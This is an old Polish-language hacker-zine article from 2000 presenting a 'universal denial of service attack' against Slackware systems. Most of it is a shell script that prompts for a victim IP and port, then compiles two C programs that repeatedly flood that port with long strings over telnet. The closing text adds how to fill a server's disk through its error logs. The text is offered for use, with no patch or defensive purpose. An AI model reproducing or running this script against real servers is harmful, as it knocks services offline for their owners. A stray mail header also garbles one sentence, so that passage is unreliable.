
              Uniwersal Denial of Service Attack for Slackware
	                      by Cybergate 
	                  Invaders Of Milenium PL
			  
			  
1) Wstep			  

Systemy slackware maja dosc powaznego buga, pozawalajacego zawiesic niektore
porty. Jak narazie udalo mi sie wykluczyc z narazonych innych dystrybucji
tylko Red Hat'a i S.u.S.E. Prawdopodobnie tylko Slackware jest narazony !!!.

2) Opis 

Niedawno mowilem o dziwnym zachowaniu sie portow na dlugie ciagi lancuchow
znakowych. Po przeslaniu na taki port duzego ciagu znakow, zrywalo nam 
polaczenie. To poniekad nasunelo mi na mysl, zeby napisac doska, ktory
tworzylby nam mase polaczen i przesylal na atakowany port wlasnie takie
duze ciagi znakow. No i tak narodzil sie ten program ;).
Inne systemy, jak np. Red Hat "wylapuje" nam petle, ktora tworzy polacznia i
przerywa prace programu ;(( 
Na szczescie Slackware nie ma takiego 'zabezpieczenia'.
DOS na pewno nie zawiesza portu 80 (WWW; chociaz pewnie niezle go zapycha).
Wystepuja nieraz problemy z portem 25 (Sendmail), ktorego tez niekiedy nie 
zawiesza. Zalezy to od konfiguracji systemu. 

3) Patch

Hehe....nie ma !!!!. Ask Vixen ;)))


4) Zrodleko skryptu


--- CUT HERE ---
#!/bin/sh
###################################################################
#     Uniwersal Denial Of Service Attack by Cybergate from IOM    #
#                  e-mail: gateking@polbox.com                    #
#                     Hacking in Poland 2000                      #                                                       
###################################################################
if test -f ./krycha.c
 then
  rm krycha.c
fi
if test -f ./krycha
 then
  rm krycha
fi
if test -f ./zocha.c
 then
  rm zocha.c
fi
if test -f ./zocha
 then
  rm zocha
fi
clear
echo "               Uniwersal Denial of Service Attack"
echo "                       by Cybergate [IOM]"
echo ""
echo -n "Enter IP of victim: "
read victim
echo ""
echo -n "Enter port number: "
read port
echo "Adress of victim is: $victim"
echo "Port to attack is: $port"
echo ""
echo ""
echo "Creating DOS filez..."
cat > krycha.c << EOF
#include <stdio.h>
 main()
  {
  int x;
  for(x=0; x<100; x++)
  printf("EVERYONE IS CENTER OF PRIMITIVE UNIVERSE. SON'S OF SATAN GATHER FOR ATTACK")
;
  }
EOF
gcc -o krycha krycha.c
cat << EOF > zocha.c
#include <stdlib.h>
#include <stdio.h>
      
 floder()
 {
 system("./krycha | telnet $victim $port | ./zocha");
 exit(0);
 }

main()
  {
   int x;
   for(x=0; x < 100; x++)
   floder();
   }


EOF
gcc -o zocha zocha.c
echo "Operation Complete"
echo "Now lets FUCK my Victim !!!"
rm zocha.c
rm krycha.c
echo "Starting...."
./zocha

--- CUT HERE ----


5) Zakonczenie

Skryptem tym niezle mozna zapchac server. UstanawiaX-Mozilla-Status: 0009re
exportuja do servera mase danych na port 80, mozna zapchac dysk. Kazde zapytanie
demona http, ktore jest dla niego niezrozumiale zostaje zalogowane w pliku
/ver/log/error_log Jezeli jestesmy baardzo cierpliwi mozna doprowadzic do 
zapchania dysku ;]
Greetz to: Vixen, At0mic, Serus, Crit, ^HaDeS^, Mauser i inni ktorzy kiedys
mi pomogli.
                      Hacking in Poland 2000



			  		